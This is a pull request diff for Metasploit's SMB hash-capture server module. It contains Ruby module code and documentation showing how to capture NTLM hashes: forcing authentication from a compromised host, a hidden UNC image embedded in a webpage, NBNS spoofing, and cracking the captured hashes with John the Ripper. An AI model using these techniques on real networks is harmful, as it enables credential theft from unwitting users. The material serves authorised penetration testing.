### PR TITLE
Overhaul SMB auth capture server

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -415,7 +415,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (2.0.10)
+    ruby_smb (2.0.11)
       bindata
       openssl-ccm
       openssl-cmac

--- a/documentation/modules/auxiliary/server/capture/smb.md
+++ b/documentation/modules/auxiliary/server/capture/smb.md
@@ -7,10 +7,13 @@ Microsoft provides an article on how to detect, disable, and enable SMB in vario
 [here](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server), which can be useful during testing.
 
 1. Start msfconsole
-2. Do: ```use auxiliary/server/capture/smb```
-3. Do: ```run```
-4. Connect to above server with your SMB client of choice
-5. Observe the capturing of hash, after the submssion of login details
+2. Connect DB
+3. Do: ```use auxiliary/server/capture/smb```
+4. Do: ```run```
+5. Connect to above server with your SMB client of choice
+6. Observe the capturing of hash
+7. `creds`
+8. check hash has been stored in DB correctly
 
 ## Options
 

--- a/documentation/modules/auxiliary/server/capture/smb.md
+++ b/documentation/modules/auxiliary/server/capture/smb.md
@@ -1,67 +1,62 @@
-This module creates a mock SMBv1 server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`.
+This module creates a mock SMB server which accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMBv1 & SMBv2, and captures NTLMv1 & NTLMv2 hashes.
 
-SMBv1 is enabled by default on systems before, and including:
 
- * Windows XP
- * Windows Server 2008 R2
-
-Microsoft provides an article on how to detect, disable, and enable SMB in various versions
-[here](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server)
 
 ## Verification Steps
+Microsoft provides an article on how to detect, disable, and enable SMB in various versions
+[here](https://support.microsoft.com/en-us/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server), which can be useful during testing.
 
-  1. Start msfconsole
-  2. Do: ```use auxiliary/server/capture/smb```
-  3. Do: ```run```
+1. Start msfconsole
+2. Do: ```use auxiliary/server/capture/smb```
+3. Do: ```run```
+4. Connect to above server with your SMB client of choice
+5. Observe the capturing of hash, after the submssion of login details
 
 ## Options
 
-  **CAINPWFILE**
+**CAINPWFILE**
 
-  A file to store Cain & Abel formatted captured hashes in
+A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 Hashes.
 
-  **CHALLENGE**
+**CHALLENGE**
 
-  An 8 byte server challenge.  Default is `1122334455667788`
+The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.
 
-  **JOHNPWFILE**
+**JOHNPWFILE**
 
-  A file to store John the Ripper formatted hashes in
+A file to store John the Ripper formatted hashes in.
+
+**DOMAIN**
+
+The domain name used during smb exchange.
 
 ## Scenarios
 
 ### Linux Connection via smbclient
 
-Ubuntu 18.04 with `smbclient 4.7.6-Ubuntu` installed.
-
-Based on [shellvoide.com](https://www.shellvoide.com/hacks/how-to-setup-rogue-fake-smb-server-to-capture-credentials/)
-
-You'll need to set `client use spnego = no` under `[global]` in `smb.conf` to ensure SMBv1 compatibility.
+Kali 2021.1 with `smbclient 4.13.5` installed.
 
 Server:
 
 ```
-msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
-msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
-johnpwfile => /tmp/john
-msf5 auxiliary(server/capture/smb) > run
-[*] Auxiliary module running as background job 0.
-[*] SMB Captured - 2019-09-25 22:44:04 -0400
-NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
-USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:a6b70b49c8d42903fbe6231ce53a21ff 
-NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
-[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ... 
+msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
+JOHNPWFILE => /tmp/john
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 1.
+
+[+] Server is running. Listening on 0.0.0.0:445
+
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client   : 192.168.1.48
+[SMB] NTLMv2-SSP Username : WORKGROUP\kali
+[SMB] NTLMv2-SSP Hash     : kali::WORKGROUP:736a878aaa12787d:63b3d264cfcdff09b45f6bc05e5f8e47:01010000000000008060dc6c958fd70141b248fffd1ac50b000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f0075007300070008008060dc6c958fd70106000400020000000800300030000000000000000000000000000000d68027f68e3bbafdb72e0ff445687858643dbad597210f1273fa58505bc4be360a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0031002e0031003900360000000000
 ```
 
 Client:
 
 ```
-root@Kali:~# grep spnego /etc/samba/smb.conf 
-client use spnego = no
-root@Kali:~# smbclient //1.1.1.1/fake
+root@Kali:~# smbclient //192.168.89.1/fake
 Enter WORKGROUP\root's password: 
 session setup failed: NT_STATUS_LOGON_FAILURE
 ```
@@ -69,8 +64,8 @@ session setup failed: NT_STATUS_LOGON_FAILURE
 Crack the Hash:
 
 ```
-# cat /tmp/john_netntlmv2
-ubuntu::WORKGROUP:1122334455667788:a6b70b49c8d42903fbe6231ce53a21ff:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
+# cat /tmp/john
+kali::WORKGROUP:736a878aaa12787d:63b3d264cfcdff09b45f6bc05e5f8e47:01010000000000008060dc6c958fd70141b248fffd1ac50b000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f0075007300070008008060dc6c958fd70106000400020000000800300030000000000000000000000000000000d68027f68e3bbafdb72e0ff445687858643dbad597210f1273fa58505bc4be360a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e0031002e0031003900360000000000
 # john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
 Using default input encoding: UTF-8
 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
@@ -87,29 +82,26 @@ Session completed
 
 Method also confirmed on Windows 2008r2
 
-Based off of [hackers-arise.com](https://www.hackers-arise.com/single-post/2018/11/19/Metasploit-Basics-Part-20-Creating-a-Fake-SMB-Server-to-Capture-Credentials)
+Based off of [hackers-arise.com](https://web.archive.org/web/20210503073722/https://www.hackers-arise.com/post/2018/11/19/metasploit-basics-part-20-creating-a-fake-smb-server-to-capture-credentials)
 
 The idea here is we have a shell on a Windows box where we can't `hashdump` due to user permissions.
 However, we're able to do a `net use` to make an `SMB` connection back to our server to get the
 user's hash, then hopefully crack it.
 
 ```
-meterpreter > getuid
-Server username: WINXP\test
 meterpreter > hashdump
 [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
 meterpreter > background
 [*] Backgrounding session 1...
-msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
-msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
-johnpwfile => /tmp/john
-msf5 auxiliary(server/capture/smb) > run
-[*] Auxiliary module running as background job 0.
-msf5 auxiliary(server/capture/smb) > 
-[*] Started service listener on 0.0.0.0:445 
-[*] Server started.
+msf6 exploit(multi/handler) > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > set JOPHNPWFILE /tmp/john
+JOHNPWFILE => /tmp/john
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 1.
 
-msf5 auxiliary(server/capture/smb) > sessions -i 1
+[+] Server is running. Listening on 0.0.0.0:445
+
+msf6 auxiliary(server/capture/smb) > sessions -i 1
 [*] Starting interaction with 1...
 
 meterpreter > shell
@@ -118,15 +110,12 @@ Channel 1 created.
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.
 
-C:\Documents and Settings\test\Desktop>net use \\1.1.1.1 fake
+C:\Documents and Settings\test\Desktop>net use \\192.168.89.1 fake
 
-[*] SMB Captured - 2019-09-25 22:26:04 -0400
-NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
-USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
-LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
-NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
-net use \\1.1.1.1 fake
-System error 1326 has occurred.
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client   : 192.168.89.135
+[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
+[SMB] NTLMv1-SSP Hash     : Administrator::ADAM-9256FBF58E:a24be400055ae1ef1a33f3ab7be1728952c359127a11df42:83468ec2e17ac10e1eccd724764111402c218c36f39ae0f4:1ab4f830af5ee914
 
 Logon failure: unknown user name or bad password.
 
@@ -157,146 +146,53 @@ Session completed
 One way to coax a user into creating an SMB connection is to embed it in a website
 
 First, create the website (we're using Kali for this) with the following content:
+
+
 ```
 <html>
-<head>
-<title>UNC Example</title>
-</head>
-<body>
-<img src="file:////1.1.1.1/fake.jpg" width="0px" height="0px">
-</body>
+	<head>
+		<title>UNC Example</title>
+	</head>
+	<body>
+		<img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
+	</body>
 </html>
 ```
+
 
 This file, for the example is in `/var/www/html/unc.html`.
 
 Also of note, this could be done via XSS or other injection technique.
 
-Start the webserver: ```service apache2 start```
+Start the webserver:
+
+```service apache2 start```
 
 Server:
+
 ```
-msf5 > use auxiliary/server/capture/smb
-msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
-johnpwfile => /tmp/john
-msf5 auxiliary(server/capture/smb) > run
-[*] Auxiliary module running as background job 0.
-msf5 auxiliary(server/capture/smb) > 
-[*] Started service listener on 0.0.0.0:445 
-[*] Server started.
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:957c33ac7e9d7bf4459ddb2c65109aaa 
-NT_CLIENT_CHALLENGE:01010000000000007a7e22719474d5014eb86a13abf5f61000000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:e4411aead169063032e832539864b4ff 
-NT_CLIENT_CHALLENGE:0101000000000000fd0e3f719474d501ed3acc4801283dee00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:f09d780a73410902dae21653cc9ef117 
-NT_CLIENT_CHALLENGE:0101000000000000bed143719474d5015e71b1d1c6aba91800000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:b9f84605b6cd0feb57c38f5d7251d5e0 
-NT_CLIENT_CHALLENGE:01010000000000007f9448719474d50164270f62c422d35200000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:a1f2d3c84c444368bea5cac47707faec 
-NT_CLIENT_CHALLENGE:01010000000000003f574d719474d50197b541b568bd9d3600000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:b895915d8c813c99512904bd1b84f2e2 
-NT_CLIENT_CHALLENGE:0101000000000000001a52719474d501b8fa9400bb1ff22f00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:309c3abcd382e8541a811a8d9af66002 
-NT_CLIENT_CHALLENGE:0101000000000000c0dc56719474d501cea04f59f7a5dc5a00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:1378542b978996b23f6f88c8d52b3d22 
-NT_CLIENT_CHALLENGE:0101000000000000819f5b719474d501cd5954986a11cd6600000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:425740c14d740ba89aae0533e1c320bb 
-NT_CLIENT_CHALLENGE:0101000000000000416260719474d501dc6bac2b5637209b00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:b291ca93971c18c3fa3f9789c25296c8 
-NT_CLIENT_CHALLENGE:0101000000000000022565719474d501d583f2f3dbf2ea0000000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:3a908e59fe9f96a7f871b3aa2155dce1 
-NT_CLIENT_CHALLENGE:0101000000000000c2e769719474d5015e8a4d8a139e8eea00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:2a76fc76174c297712b08e301ac1b08e 
-NT_CLIENT_CHALLENGE:010100000000000083aa6e719474d5019684d5d78475e27500000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:5d7057563a44671ec26ec021613f45b4 
-NT_CLIENT_CHALLENGE:0101000000000000a4ce75719474d50184900d6f208cb07500000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:ec6ce9d5171e9f5ee017d963797e760c 
-NT_CLIENT_CHALLENGE:010100000000000064917a719474d501006e93848f1fb88100000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 14:01:37 -0400
-NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:d96937debde3ce251f6889fc1be21a2f 
-NT_CLIENT_CHALLENGE:010100000000000025547f719474d5014dd729fda10cf20c00000000020000000000000000000000
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/john
+JOHNPWFILE => /tmp/john
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 1.
+
+[+] Server is running. Listening on 0.0.0.0:445
+
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client   : 192.168.89.135
+[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
+[SMB] NTLMv1-SSP Hash     : Administrator::ADAM-9256FBF58E:22f18e6b511c5249bfea193a6a456426bb0b6ddeea0ea7c2:2bc17238894d18eb455fdd9e8ec360c1ea3b33321d178a5f:b4c64af3688809f4
 ```
 
 Client:
+
 ```
 Browse to the webpage.  This example is on Windows Server 2008r2 with Internet Explorer.
 ```
 
 Crack the password:
+
 ```
 # john /tmp/john_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
 Using default input encoding: UTF-8
@@ -334,63 +230,40 @@ to conduct the spoofing.  If a Windows user attempts to browse or mount a networ
 This is based on [hackingarticles.in](https://www.hackingarticles.in/4-ways-capture-ntlm-hashes-network/)
 
 Server side:
-```
-msf5 > use auxiliary/server/capture/smb
-msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/johnnbns
-johnpwfile => /tmp/johnnbns
-msf5 auxiliary(server/capture/smb) > run
-[*] Auxiliary module running as background job 0.
-msf5 auxiliary(server/capture/smb) > 
-[*] Started service listener on 0.0.0.0:445 
-[*] Server started.
 
-msf5 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
-msf5 auxiliary(spoof/nbns/nbns_response) > set spoofip 1.1.1.1
-spoofip => 1.1.1.1
-msf5 auxiliary(spoof/nbns/nbns_response) > set interface eth0
+```
+msf6 > use auxiliary/server/capture/smb
+msf6 auxiliary(server/capture/smb) > set JOHNPWFILE /tmp/johnnbns
+JOHNPWFILE => /tmp/johnnbns
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+
+[+] Server is running. Listening on 0.0.0.0:445
+msf6 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
+msf6 auxiliary(spoof/nbns/nbns_response) > set spoofip 192.168.89.1
+spoofip => 192.168.89.1
+msf6 auxiliary(spoof/nbns/nbns_response) > set interface eth0
 interface => eth0
-msf5 auxiliary(spoof/nbns/nbns_response) > exploit
+msf6 auxiliary(spoof/nbns/nbns_response) > exploit
 [*] Auxiliary module running as background job 1.
-msf5 auxiliary(spoof/nbns/nbns_response) > 
+msf6 auxiliary(spoof/nbns/nbns_response) > 
 [*] NBNS Spoofer started. Listening for NBNS requests with REGEX ".*" ...
-[+] 2.2.2.2    nbns - FAKE matches regex, responding with 1.1.1.1
-[+] 2.2.2.2    nbns - FAKE matches regex, responding with 1.1.1.1
-[*] SMB Captured - 2019-09-26 16:19:09 -0400
-NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:5a44b22db99861330e1637f0565f595f 
-NT_CLIENT_CHALLENGE:010100000000000022529fa7a774d501b3b3f093392560d600000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 16:19:09 -0400
-NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:00837cb572f0116c7544ca0f56d31f5c 
-NT_CLIENT_CHALLENGE:0101000000000000c606c3a7a774d501c28ee74be786099100000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 16:19:09 -0400
-NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:b571090dea4270b6b6d2b3de39321b29 
-NT_CLIENT_CHALLENGE:010100000000000087c9c7a7a774d501c00e467bda8a8b4a00000000020000000000000000000000
-[*] SMB Captured - 2019-09-26 16:19:09 -0400
-NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
-USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
-LMHASH:Disabled 
-LM_CLIENT_CHALLENGE:Disabled
-NTHASH:dc28e9e94c6199e814937d61e3956c7d 
-NT_CLIENT_CHALLENGE:0101000000000000084fd1a7a774d5014f34895403460b1b00000000020000000000000000000000
+[+] 192.168.89.135    nbns - FAKE matches regex, responding with 192.168.89.1
+[+] 192.168.89.135    nbns - FAKE matches regex, responding with 192.168.89.1
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv1-SSP Client   : 192.168.89.135
+[SMB] NTLMv1-SSP Username : ADAM-9256FBF58E\Administrator
+[SMB] NTLMv1-SSP Hash     : Administrator::ADAM-9256FBF58E:603fd7b40a566fdb974dc56ef6da91bebd500cef4b7758dd:eb64ff6a5bfa268ef178d32835dbb07385fbb340ae3794fa:431f659ef973decc
 ```
 
 Victim:
+
 ```
 Open Explorer and type \\fake
 ```
 
 Finally, Crack the password:
+
 ```
 # john /tmp/johnnbns_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
 Using default input encoding: UTF-8

--- a/documentation/modules/auxiliary/server/capture/smb.md
+++ b/documentation/modules/auxiliary/server/capture/smb.md
@@ -150,18 +150,16 @@ One way to coax a user into creating an SMB connection is to embed it in a websi
 
 First, create the website (we're using Kali for this) with the following content:
 
-
-```
+```html 
 <html>
-	<head>
-		<title>UNC Example</title>
-	</head>
-	<body>
-		<img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
-	</body>
+  <head>
+    <title>UNC Example</title>
+  </head>
+  <body>
+    <img src="file:////192.168.89.1/fake.jpg" width="0px" height="0px">
+  </body>
 </html>
 ```
-
 
 This file, for the example is in `/var/www/html/unc.html`.
 

--- a/lib/metasploit/framework/hashes/identify.rb
+++ b/lib/metasploit/framework/hashes/identify.rb
@@ -12,6 +12,9 @@
 #  https://openwall.info/wiki/john/sample-hashes
 #  QNX formats -> https://moar.so/blog/qnx-password-hash-formats.html
 
+JTR_NTLMV1 = 'netntlm'
+JTR_NTLMV2 = 'netntlmv2'
+
 def identify_hash(hash)
   hash = hash.to_s.strip
   case

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -66,8 +66,8 @@ class MetasploitModule < Msf::Auxiliary
 
       def process_ntlm_type1(type1_msg)
         @client_os_version = type1_msg.os_version
-        # TODO: discern mapping +major+ and +minor+ to human-readable OS names.
-        # major, minor, build, ntlm_revision = type1_msg.os_version.unpack('CCnN')
+        # TODO: write method for mapping +major+ and +minor+ OS values to human-readable OS names.
+        # @client_os_version = ::NTLM::OSVersion.read(type1_msg.os_version)
         super
       end
 

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -51,7 +51,6 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('DOMAIN_NAME', [ true, 'The domain name used during smb exchange.', 'anonymous' ])
       ]
     )
-
   end
 
   class HashCaptureNTLMProvider < RubySMB::Gss::Provider::NTLM
@@ -122,7 +121,7 @@ class MetasploitModule < Msf::Auxiliary
     attr_reader :listener
   end
 
-  def on_cred(address, combined_hash, jtr_format, username, server_challenge, client_hash, domain, client_os_version)
+  def on_cred(address, combined_hash, jtr_format, username, server_challenge, client_hash, domain, _client_os_version)
     if active_db?
       origin = create_credential_origin_service(
         {
@@ -135,9 +134,9 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
 
-      # TODO: Re-implement when +client_os_version+ can be determined.
+      # TODO: Re-implement when +_client_os_version+ can be determined.
       # found_host = framework.db.hosts.find_by(address: address)
-      # found_host.os_name = client_os_version
+      # found_host.os_name = _client_os_version
       # found_host.save!
 
       create_credential(
@@ -230,7 +229,7 @@ class MetasploitModule < Msf::Auxiliary
 
     server.run do
       print_line
-      print_good "Received SMB connection on Auth Capture Server!"
+      print_good 'Received SMB connection on Auth Capture Server!'
       true
     end
   end

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     # Cain & Abel doesn't support import of NTLMv2 hashes
-    if datastore['CAINPWFILE'] && creds[:jtr_format] == 'netntlm'
+    if datastore['CAINPWFILE'] && creds[:jtr_format] == JTR_NTLMV1
       # Cain&Abel hash format
       # Username:Domain:Challenge:LMHash:NTLMHash
       File.open(File.expand_path(datastore['CAINPWFILE'], Msf::Config.install_root), 'ab') do |f|

--- a/modules/auxiliary/server/capture/smb.rb
+++ b/modules/auxiliary/server/capture/smb.rb
@@ -3,6 +3,9 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'ruby_smb'
+require 'ruby_smb/gss/provider/ntlm'
+
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::SMB::Server
@@ -13,9 +16,9 @@ class MetasploitModule < Msf::Auxiliary
       'Description' => %q{
         This module provides a SMB service that can be used to capture the
         challenge-response password hashes of SMB client systems. Responses
-        sent by this service have by default the configurable challenge string
-        (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using
-        Cain & Abel, L0phtcrack or John the ripper (with jumbo patch).
+        sent by this service have by default a random 8 byte challenge string
+        of format `\x11\x22\x33\x44\x55\x66\x77\x881, allowing for easy cracking using
+        Cain & Abel (NTLMv1) or John the ripper (with jumbo patch).
 
         To exploit this, the target system must try to authenticate to this
         module. One way to force an SMB authentication attempt is by embedding
@@ -25,626 +28,200 @@ class MetasploitModule < Msf::Auxiliary
         address of the system running this module) and attempt to
         authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to
         respond to queries for names the victim is already looking for.
+
+        Documentation of the above spoofing methods can be found by running `info -d`.
       },
-      'Author' => 'hdm',
+      'Author' => [
+        'hdm',                 # Author of original module
+        'zeroSteiner',         # Creator of RubySMB::Server
+        'agalway-r7',          # Port of existing module to use RUBYSMB::Server
+        'sjanusz-r7',          # Port of existing module to use RUBYSMB::Server
+      ],
       'License' => MSF_LICENSE,
-      'Actions' => [[ 'Capture', 'Description' => 'Run SMB capture server' ]],
+      'Actions' => [[ 'Capture', { 'Description' => 'Run SMB capture server' } ]],
       'PassiveActions' => [ 'Capture' ],
       'DefaultAction' => 'Capture'
     })
 
     register_options(
       [
-        OptString.new('CAINPWFILE',  [ false, "The local filename to store the hashes in Cain&Abel format", nil ]),
-        OptString.new('JOHNPWFILE',  [ false, "The prefix to the local filename to store the hashes in John format", nil ]),
-        OptString.new('CHALLENGE',   [ true, "The 8 byte server challenge", "1122334455667788" ])
-      ])
+        OptString.new('CAINPWFILE', [ false, 'The local filename to store Cain&Abel format hashes in. Only supports NTLMv1 hashes.', nil ]),
+        OptString.new('JOHNPWFILE', [ false, 'The local filename to store JTR format hashes in.', nil ]),
+        OptString.new('CHALLENGE', [ false, 'The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.' ]),
+        OptString.new('DOMAIN_NAME', [ true, 'The domain name used during smb exchange.', 'anonymous' ])
+      ]
+    )
 
-    register_advanced_options(
-      [
-        OptBool.new("SMB_EXTENDED_SECURITY",
-          [ true,
-            "Use smb extended security negotiation, when set client will use " \
-            "ntlmssp, if not then client will use classic lanman " \
-            "authentification",
-            false
-          ]),
-        OptBool.new("NTLM_UseNTLM2_session",
-          [ true,
-            "Activate the 'negotiate NTLM2 key' flag in NTLM authentication. " \
-            "When SMB_EXTENDED_SECURITY negotiate is set, client will use " \
-            "ntlm2_session instead of ntlmv1 (default on win 2K and above)",
-            false
-          ]),
-        OptBool.new("USE_GSS_NEGOTIATION",
-          [ true,
-            "Send a gss_security blob in smb_negotiate response when SMB " \
-            "extended security is set. When this flag is not set, Windows will " \
-            "respond without gss encapsulation, Ubuntu will still use gss.",
-            true
-          ]),
-        OptString.new('DOMAIN_NAME',
-          [ true,
-            "The domain name used during smb exchange with SMB_EXTENDED_SECURITY set.",
-            "anonymous"
-          ])
-      ])
+  end
 
+  class HashCaptureNTLMProvider < RubySMB::Gss::Provider::NTLM
+    def initialize(allow_anonymous: nil, default_domain: nil, listener: nil)
+      super(allow_anonymous: allow_anonymous, default_domain: default_domain)
+      @listener = listener
+    end
+
+    class Authenticator < RubySMB::Gss::Provider::NTLM::Authenticator
+      def bin_to_hex(str)
+        str.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
+      end
+
+      def process_ntlm_type3(type3_msg)
+        username = "#{type3_msg.domain.encode}\\#{type3_msg.user.encode}"
+        _, client = ::Socket.unpack_sockaddr_in(@server_client.getpeername)
+
+        hash_type = nil
